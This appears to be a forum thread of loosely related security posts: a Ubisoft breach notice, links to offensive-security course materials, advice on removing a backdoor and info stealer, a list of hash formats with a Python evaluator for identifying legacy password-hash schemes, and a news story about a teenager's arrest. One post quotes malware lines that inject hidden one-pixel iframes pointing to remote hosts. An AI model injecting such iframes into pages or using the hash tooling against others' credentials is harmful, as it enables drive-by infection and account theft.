Source: Vulnerability allows attackers to modify Android apps without breaking their signatures | ITworld
  21. Game publisher Ubisoft was breached and unauthorized parties accessed customers' usernames, e-mail addresses and hashed passwords. Ubisoft urges all account owners to change their passwords at once.
The French firm emailed its customers, informing them that "credentials were stolen and used to illegally access our online network" giving unauthorized people access to users' accounts. No further details on the attack were given. Currently all compromised systems are closed off and the company is working to restore them.
According to the email, no financial information was reached since Ubisoft has a payment processing company handle money-related data. "Please note that no personal payment information is stored with Ubisoft, meaning your debit/credit card information was safe from this intrusion," the e-mail reads. "Out of an abundance of caution, we also recommend that you change your password on any other Web site or service where you use the same or a similar password."
The e-mail includes a link to the company's support page that people can use for further enquiries and additional information. Ubisoft has also set up a dedicated page to allow users to quickly and safely change their Uplay account passwords. So use it to immediately restore your account information and make sure you don't have other accounts with the same password.
Source: Ubisoft Breached, Sensitive Account Data Leaked | HOTforSecurity
  22. Torrent: Offensive Security 2013 - FSU - Download - 4shared - Michael Hu
Homework pack from the course (4.5 MB): Multiupload.nl - upload your files to multiple file hosting sites!
All slides/binaries and other stuff in the pack (38 MB): Multiupload.nl - upload your files to multiple file hosting sites!
Credits for the links: mangotown, 0xdraven
  23. You found something, but not all of it. I looked over the files you posted:
~13k - a backdoor/proxy
~36k - an info stealer / view generator * you can expect some traffic ...
As long as you don't find their mother (the program that coordinates the ones above), you can't really do much with your own hands.
Officially: use a removal tool, e.g. Dr.Web, Kaspersky.
Unofficially: - unorthodox methods, with risks to match
You could install a firewall (the malware has a built-in bypass for the Windows firewall); if you are on XP I recommend Sygate, and you filter manually which application may connect to the internet and which may not, so you can keep the malware under some control.
You can take a look at start-up and disable everything you don't recognise, then pull the PC's plug (some malware checks from time to time, or before shutting down, whether its registry values are still there; by cutting the power abruptly there is some chance it won't re-add the start-up entries; the risk of the PC breaking is also present :) )
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
You can also identify the infected processes using TCPView; also, instead of Task Manager you can try Process Explorer.
As for the passwords stored on the PC (browsers, etc.), you can say goodbye to them; as long as you don't remove the malware, I think changing them is pointless.
* document.write('<iframe src="http://%s/" width=1 height=1></iframe>') document.write('<iframe src="http://%s/forum.php?%x" width=1 height=1></iframe>')
  24. ADLER-32 ; CRC-16 ; CRC-16-CCITT ; CRC-32 ; CRC-32B ; DES(Unix) ; Domain Cached Credentials ; FCS-16 ; GHash-32-3 ; GHash-32-5 ; GOST R 34.11-94 ; Haval-128 ; Haval-128(HMAC) ; Haval-160 ; Haval-160(HMAC) ; Haval-192 ; Haval-192(HMAC) ; Haval-224 ; Haval-224(HMAC) ; Haval-256 ; Haval-256(HMAC) ; Lineage II C4 ; MD2 ; MD2(HMAC) ; MD4 ; MD4(HMAC) ; MD5 ; MD5(APR) ; MD5(Custom) ; MD5(HMAC) ; MD5(HMAC(Wordpress)) ; MD5(phpBB3) ; MD5(Unix) ; MD5(Wordpress) ; MySQL ; MySQL5 ; NTLM ; Palshop ; RAdmin v2.x ; RipeMD-128 ; RipeMD-128(HMAC) ; RipeMD-160 ; RipeMD-160(HMAC) ; RipeMD-256 ; RipeMD-256(HMAC) ; RipeMD-320 ; RipeMD-320(HMAC) ; SHA-1 ; SHA-1(Django) ; SHA-1(HMAC) ; SHA-1(MaNGOS) ; SHA-1(MaNGOS2) ; SHA-224 ; SHA-224(HMAC) ; SHA-256 ; SHA-256(Django) ; SHA-256(HMAC) ; SHA-384 ; SHA-384(Django) ; SHA-384(HMAC) ; SHA-512 ; SHA-512(HMAC) ; Snefru-128 ; Snefru-128(HMAC) ; Snefru-256 ; Snefru-256(HMAC) ; Tiger-128 ; Tiger-128(HMAC) ; Tiger-160 ; Tiger-160(HMAC) ; Tiger-192 ; Tiger-192(HMAC) ; Whirlpool ; Whirlpool(HMAC) ; XOR-32 ; md5($pass.$salt) ; md5($pass.$salt.$pass) ; md5($pass.md5($pass)) ; md5($salt.'-'.md5($pass)) ; md5($salt.$pass) ; md5($salt.$pass.$salt) ; md5($salt.$pass.$username) ; md5($salt.md5($pass)) ; md5($salt.md5($pass).$salt) ; md5($salt.MD5($pass).$username) ; md5($salt.md5($pass.$salt)) ; md5($salt.md5($salt.$pass)) ; md5($salt.md5(md5($pass).$salt)) ; md5($username.0.$pass) ; md5($username.LF.$pass) ; md5($username.md5($pass).$salt) ; md5(1.$pass.$salt) ; md5(3 x strtoupper(md5($pass))) ; md5(md5($pass)) ; md5(md5($pass).$pass) ; md5(md5($pass).$salt) ; md5(md5($pass).md5($pass)) ; md5(md5($pass).md5($salt)) ; md5(md5($salt).$pass) ; md5(md5($salt).md5($pass)) ; md5(md5($username.$pass).$salt) ; md5(md5(md5($pass))) ; md5(md5(md5(md5($pass)))) ; md5(md5(md5(md5(md5($pass))))) ; md5(sha1($pass)) ; md5(sha1(md5($pass))) ; md5(sha1(md5($pass)).sha1($pass)) ; md5(sha1(md5(sha1($pass)))) ; md5(strtoupper(md5($pass))) ; substr(md5($pass),0,16) ; 
substr(md5($pass),8,16) ; substr(md5($pass),16,16) ; sha1($pass.$salt) ; sha1($salt.$pass) ; sha1($salt.$username.$pass.$salt) ; sha1($salt.md5($pass)) ; sha1($salt.md5($pass).$salt) ; sha1($salt.sha1($pass)) ; sha1($salt.sha1($salt.sha1($pass))) ; sha1($username.$pass) ; sha1($username.$pass.$salt) ; sha1(md5($pass)) ; sha1(md5($pass).$salt) ; sha1(md5(sha1($pass))) ; sha1(md5(sha1(md5($pass)))) ; sha1(sha1($pass)) ; sha1(sha1($pass).$salt) ; sha1(sha1($pass).substr($pass,0,3)) ; sha1(sha1($salt.$pass)) ; sha1(sha1(sha1($pass))) ; sha1(strtolower($username).$pass) ; sha256($pass.$salt) ; sha256($salt.$pass) ; sha256(md5($pass)) ; sha256(sha1($pass)) ; sha384($pass.$salt) ; sha384($salt.$pass) ; sha512($pass.$salt) ; sha512($salt.$pass) ; here: http://www.insidepro.com/hashes.php?lang=eng
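For the scheme notation used in the list above (md5($salt.$pass), sha1($salt.md5($pass)), substr(md5($pass),0,16) and so on), an added example that is not part of the post or of the linked site: a small evaluator for that notation, used to work out which legacy scheme an inherited user table was hashed with from one known test credential, so the table can be migrated to a proper password hash. The grammar, the handful of PHP functions supported and the candidate list are my assumptions.

```python
import hashlib
import re

HASHES = {"md5", "sha1", "sha256", "sha384", "sha512"}
# A few of the legacy schemes from the list above, in the same notation (candidates to test).
SCHEMES = ["md5($pass.$salt)", "md5($salt.$pass)", "md5($salt.md5($pass))", "sha1($salt.$pass)",
           "sha256($pass.$salt)", "substr(md5($pass),0,16)", "md5(strtoupper(md5($pass)))"]

def tokenize(scheme):
    # $vars, names and numbers, single-quoted literals, and ( ) , . punctuation
    toks = re.findall(r"\$\w+|\w+|'[^']*'|[().,]", scheme)
    if "".join(toks) != re.sub(r"\s+", "", scheme):
        raise ValueError("unsupported characters in %r" % scheme)
    return toks

def call(name, args):
    # The PHP functions that occur in the scheme list, applied to already-evaluated arguments.
    if name in HASHES:
        return hashlib.new(name, args[0].encode("utf-8")).hexdigest()
    if name in ("strtoupper", "strtolower"):
        return args[0].upper() if name == "strtoupper" else args[0].lower()
    if name == "substr":  # PHP substr($s, $start, $length)
        return args[0][int(args[1]):int(args[1]) + int(args[2])]
    raise ValueError("unsupported function %r" % name)

def evaluate(scheme, values):
    # Evaluate e.g. "md5($salt.md5($pass))" with values like {"$pass": "...", "$salt": "..."}.
    toks, pos = tokenize(scheme), [0]  # pos is a list so the nested parsers can advance it
    def expr():  # expr := term ('.' term)*, '.' being PHP string concatenation
        parts = [term()]
        while pos[0] < len(toks) and toks[pos[0]] == ".":
            pos[0] += 1
            parts.append(term())
        return "".join(parts)
    def term():  # term := $var | 'literal' | name(expr, ...) | bare number used as text
        tok, pos[0] = toks[pos[0]], pos[0] + 1
        if tok.startswith("$"):
            return values[tok]
        if tok.startswith("'"):
            return tok[1:-1]
        if pos[0] >= len(toks) or toks[pos[0]] != "(":
            return tok  # e.g. the 0 in md5($username.0.$pass)
        args = []
        while toks[pos[0]] != ")":  # skip "(" or "," and parse the next argument
            pos[0] += 1
            args.append(expr())
        pos[0] += 1  # skip ")"
        return call(tok.lower(), args)
    return expr()

def identify_scheme(stored_hex, schemes=SCHEMES, **fields):
    # Names of the candidate schemes that reproduce stored_hex from a known test credential.
    values = {"$" + k: v for k, v in fields.items()}
    return [s for s in schemes if evaluate(s, values).lower() == stored_hex.lower()]
```

Entries written in other notation, such as md5(3 x strtoupper(md5($pass))) or $username.LF.$pass, are not parsed by this evaluator.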
  25. An 18-year-old teenager from Texas has been arrested and faces eight years in prison because of a message posted as a joke on his Facebook page, the Daily Mail writes.
After a dispute with a friend he was playing an online game with, Justin Carter wrote a comment on the Internet: "I'm going to go to a school full of kids and shoot them all, then eat their still-beating hearts". Although at the end of the message the young man indicated that he was only being sarcastic, a woman from Canada reported him to the police immediately, especially since all of this happened only a few months after the armed attack at a school in Sandy Hook. Twenty children were killed then.
Justin was arrested in February and, despite his parents' efforts, is still behind bars. "These people are serious. They really want to put my son in prison for a sarcastic comment he made," commented Jack, the teenager's father. "Justin was the kind of kid who didn't read the papers. He didn't watch TV. He wasn't up to date with current events. These kids don't realise what they're doing. They don't understand the implications. They don't know what public space means," he added.
Moreover, the man is now trying to raise an alarm about cases of this kind and to teach young people to be responsible even online: "Social networks are not a playground. Everything you say there can be used against you," Jack stressed.
According to the cited source, Justin Carter is now charged with making terrorist threats and will be brought before a court on July 1. Until then, the boy remains in police custody.
Source: VIDEO. A US teenager faces eight years in prison because of a Facebook post - Gandul